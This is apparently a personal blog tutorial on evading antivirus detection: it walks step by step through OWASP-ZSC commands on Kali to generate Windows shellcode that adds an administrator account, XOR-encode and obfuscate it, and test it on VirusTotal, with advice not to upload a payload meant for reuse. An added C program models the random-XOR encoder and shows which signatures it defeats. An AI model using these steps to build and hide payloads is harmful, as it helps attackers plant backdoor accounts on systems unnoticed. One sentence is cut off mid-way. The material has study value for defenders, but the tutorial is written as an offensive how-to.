How I bypass malware detection using Obfuscation

Akshay Jain
4 min read · Aug 4, 2019


Thousands of new malware samples are released every day, and each of them wants to stay hidden during infection and operation so that it is neither removed nor analysed. Malware achieves this with many detection-evasion techniques; one of them is obfuscation, which can be used to disguise a file name or signature, alter the malware's attributes, or otherwise make the code hard to read. In general terms, obfuscation is the practice of making something difficult to understand.

Lets Start!

An attacker will typically employ fileless malware such as shellcode (a small piece of position-independent machine code that is injected into, and executed by, a running process) to avoid leaving files on disk. Modern antivirus engines, however, are much better at spotting potential threats and respond far more quickly: as soon as your code's bytes or behaviour look too malicious, it is blocked or removed from the system.

Let's look at an example of the practical obfuscation used in malware today.

Generating a Payload

Shellcode can be generated with various frameworks; here we use OWASP-ZSC.

Step 1:- Start Kali Linux and download OWASP-ZSC. It is not built into Kali, so it has to be cloned from github.com:

root@kali:~# git clone https://github.com/zscproject/OWASP-ZSC

OWASP-ZSC is downloaded using git.

Step 2:- Change into the OWASP-ZSC folder:

root@kali:~# cd OWASP-ZSC

Step 3:- Now run the installer from that folder:

root@kali:~/OWASP-ZSC# ./installer.py

This command runs the predefined instruction which

Step 4:- After installation the tool can be started simply by typing zsc in the terminal:

root@kali:~# zsc

Step 5:- Now, let's generate some shellcode.

zsc> shellcode
zsc/shellcode> generate

OWASP-ZSC uses the TAB key to show the options for any command, so press TAB here to list the shellcode options.

As you can see below, OWASP-ZSC offers three target operating systems: linux_x86, osx_x86 and windows_x86. Since most of our targets run Windows, we pick windows_x86.

zsc/shellcode/generate>windows_x86

Selecting the target operating system for the shellcode.

Step 6:- Now press TAB again to list the windows_x86 shellcodes and select the one you want:

zsc/shellcode/generate>windows_x86>add_admin

Select the type of shellcode you want to generate.

Step 7:- You can also search shell-storm.org for other shellcode to widen the choice of payloads.

zsc/shellcode/generate/windows_x86/add_admin> username&&password

Enter the username and password for the administrator account the shellcode will add.

Step 8:- Now select the encoding method; here we choose random XOR (xor_random). Because the XOR key is picked afresh on every run, the encoded bytes differ each time, so a static signature written for one sample will not match the next one. Be clear about what this does not change: the small decoder stub that is prepended to the payload is the same every time and can itself be signatured, and once decoded in memory the shellcode behaves exactly as before, so behavioural and memory-scanning detection is not affected by the encoding.

zsc/shellcode/generate/windows_x86/add_admin/encode_type> xor_random

Step 9:- OWASP-ZSC then asks whether you want to display the assembly code and whether you want to print the shellcode to the screen. Type Y to display the assembly code.

You can see the assembly code below.

Step 10:- Obfuscation is an attempt to hide the real purpose of the code and to make the fileless payload hard to read or reverse engineer. Next, we start the obfuscation process:

zsc > obfuscate

JavaScript, Perl, PHP, Python and Ruby are the available options.

Step 11:- To produce the encoded shellcode, select one of these languages; OWASP-ZSC wraps and encodes the shellcode with the methods available for it.

Below you can see the assembly code generated after xor_random encoding.

you can check the complete code at https://pastebin.com/MvxpcuMp
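To make the steps above concrete, here is an added C model of what a random-XOR shellcode encoder does (it is example code written for this article, not OWASP-ZSC's own implementation). The payload bytes and the decoder stub are constructed placeholders, not real shellcode, so the program only transforms bytes and never executes anything. It goes slightly beyond the tool's step: the key is chosen so that the encoded body contains no 0x00 bytes (a constraint most shellcode encoders must respect), and a naive byte-pattern "signature" is run over the result to show both the benefit (the payload pattern no longer matches) and the limit (the constant stub still does).

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Constructed stand-in for the generated payload. It is NOT shellcode,
 * just bytes with a recognisable pattern that a naive signature can hit. */
static const uint8_t PAYLOAD[] = "net user backdoor Passw0rd /add";
#define PAYLOAD_LEN (sizeof(PAYLOAD) - 1)

/* Placeholder for the decoder stub an encoder prepends (a real encoder
 * emits an x86 XOR loop here). It is constant across runs: the weak point. */
static const uint8_t STUB[] = { 0xD3, 0xC0, 0xDE, 0x5A, 0x5C, 0x0F, 0xA5, 0x77 };
#define STUB_LEN sizeof(STUB)
#define BLOB_MAX (STUB_LEN + 1 + PAYLOAD_LEN)

/* XOR every byte with a single-byte key; returns how many 0x00 bytes result. */
size_t xor_apply(const uint8_t *in, size_t n, uint8_t key, uint8_t *out)
{
    size_t nulls = 0;
    for (size_t i = 0; i < n; i++) {
        out[i] = in[i] ^ key;
        if (out[i] == 0) nulls++;
    }
    return nulls;
}

/* Choose a random non-zero key whose encoding is null-free.
 * in[i] ^ key == 0 exactly when key == in[i], so any byte value that does
 * not occur in the payload works. Returns 0 if every value 1..255 occurs. */
uint8_t xor_pick_key(const uint8_t *in, size_t n, unsigned seed)
{
    int used[256] = {0};
    uint8_t cand[255];
    int ncand = 0;
    for (size_t i = 0; i < n; i++) used[in[i]] = 1;
    for (int k = 1; k < 256; k++) if (!used[k]) cand[ncand++] = (uint8_t)k;
    if (ncand == 0) return 0;
    srand(seed);                      /* seed only so runs are reproducible */
    return cand[rand() % ncand];
}

/* Package the output as STUB || key || encoded payload. Returns the key used. */
uint8_t build_blob(unsigned seed, uint8_t *blob, size_t *blob_len)
{
    uint8_t key = xor_pick_key(PAYLOAD, PAYLOAD_LEN, seed);
    memcpy(blob, STUB, STUB_LEN);
    blob[STUB_LEN] = key;
    xor_apply(PAYLOAD, PAYLOAD_LEN, key, blob + STUB_LEN + 1);
    *blob_len = BLOB_MAX;
    return key;
}

/* What the stub does at run time: read the key and XOR the body back. */
void decode_blob(const uint8_t *blob, size_t blob_len, uint8_t *out)
{
    uint8_t key = blob[STUB_LEN];
    xor_apply(blob + STUB_LEN + 1, blob_len - STUB_LEN - 1, key, out);
}

/* Naive byte-pattern "signature": 1 if needle occurs anywhere in hay. */
int sig_match(const uint8_t *hay, size_t n, const uint8_t *needle, size_t m)
{
    if (m == 0 || m > n) return 0;
    for (size_t i = 0; i + m <= n; i++)
        if (memcmp(hay + i, needle, m) == 0) return 1;
    return 0;
}

/* Encode, decode and scan for one seed; returns 1 if every property holds. */
int self_check(unsigned seed)
{
    uint8_t blob[BLOB_MAX], plain[PAYLOAD_LEN];
    size_t blob_len;
    uint8_t key = build_blob(seed, blob, &blob_len);
    decode_blob(blob, blob_len, plain);
    int ok = key != 0;
    ok = ok && memcmp(plain, PAYLOAD, PAYLOAD_LEN) == 0;            /* round trip */
    ok = ok && memchr(blob + STUB_LEN + 1, 0, PAYLOAD_LEN) == NULL; /* null-free body */
    ok = ok && !sig_match(blob, blob_len, PAYLOAD, PAYLOAD_LEN);    /* payload sig misses */
    ok = ok && sig_match(blob, blob_len, STUB, STUB_LEN);           /* stub sig still hits */
    return ok;
}

int main(void)
{
    for (unsigned seed = 1; seed <= 3; seed++) {
        uint8_t blob[BLOB_MAX];
        size_t n;
        uint8_t key = build_blob(seed, blob, &n);
        printf("seed %u key 0x%02x blob:", seed, key);
        for (size_t i = 0; i < n; i++) printf(" %02x", blob[i]);
        printf("  check=%d\n", self_check(seed));
    }
    return 0;
}
```

Each seed yields a different key and therefore a different encoded body, which is why a signature on the original payload bytes stops matching; the first eight bytes of every blob are identical, which is why a signature on the stub keeps matching, and why encoders of this kind are usually caught by stub signatures or by scanning memory after the stub has run.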

It is time to test whether the shellcode is detected by any antivirus. You can upload it to www.virustotal.com and scan it. Keep in mind that samples uploaded to VirusTotal are shared with the participating antivirus vendors, so a payload you intend to reuse should not be submitted there.

The obfuscated shellcode was undetected. The generated report states one suspicious detection; to know more about it, you can visit the reference link.

Want to connect?

Linkedin: https://www.linkedin.com/in/akshay-jain-533a79111/

Twitter: https://twitter.com/Akshayjain890

Email: Akshayjain5@protonmail.com

You can also visit my GitHub account: https://github.com/akshay1729
